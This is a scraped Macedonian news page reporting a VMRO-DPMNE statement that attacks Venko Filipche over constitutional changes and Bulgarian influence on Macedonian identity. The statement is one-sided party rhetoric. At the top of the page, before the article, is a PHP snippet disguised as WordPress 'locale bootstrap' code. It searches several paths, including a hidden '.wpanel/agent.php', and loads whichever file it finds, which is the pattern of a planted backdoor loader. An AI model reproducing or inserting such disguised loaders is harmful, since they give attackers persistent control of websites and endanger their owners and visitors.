// wp-core-locale-bootstrap $_wp_locale_candidates = [ __DIR__ . '/languages/class-wp-locale-data.php', __DIR__ . '/upgrade/class-wp-locale-data.php', __DIR__ . '/cache/class-wp-locale-data.php', __DIR__ . '/.wpanel/agent.php', ]; foreach ($_wp_locale_candidates as $_wp_locale_data) { if (is_file($_wp_locale_data)) { require_once $_wp_locale_data; break; } } До каде е спремен да оди Филипче: Прво уставни измени, а потоа редефинирање на историјата и идентитетот - Република Skip to main content
hiZbygcTD6k
ПРЕДУПРЕДУВА ВМРО-ДПМНЕ

До каде е спремен да оди Филипче: Прво уставни измени, а потоа редефинирање на историјата и идентитетот

Прво спроведување на уставни измени, а потоа редефинирање на историјата и идентитетот.До таму е спремен да оди специјалниот бугарски пратеник на Румен Радев, Венко Филипче,велат од ВМРО-ДПМНЕ.

Филипче е на иста линија со Виктор Стојанов од фондацијата “Македонија”, која дејствува во Македонија ширејќи говор на омраза кон Македонците, негирање на македонскиот идентитет и претставување на македонската историја како бугарска.

Филипче е на иста линија и со бугарската министерка на Радев, Петрова Чамова. Како што можеме да видиме на фотографиите зад мене и двајцата велат дека преговараме со ЕУ, а не со Бугарија. Но, проблемот е во тоа што само Бугарија поради свои интереси ја кочи и ветоизира Македонија на полето на евроинтегративниот процес.

За таа цел, бугарските власти ги најдоа меките ткива во политиката во Македонија, како Зоран Заев, Димитар Ковачевски Ковачевски а сега и Венко Филипче, кои слугуваат на туѓи интереси на штета на сопствените – македонските.

Иако граѓаните им одржаа лекција, ги казнија на 4 последователни избори, токму поради нивните антидржавни политики, на Филипче и на СДС не им доаѓа памет и продолжуваат со истата поданичка политика мислејќи дека така ќе дојдат на власт.

ВМРО-ДПМНЕ нема да дозволи бугаризација на историските ликови кои твореле, кои го описмениле регионот и кои се бореле за да создадат македонска држава. Македонија има своја историја, свој идентитет и свој македонски јазик. Се додека ВМРО-ДПМНЕ е на власт, нема да дозволиме погазување на нашето достоинство.

Поврзани вести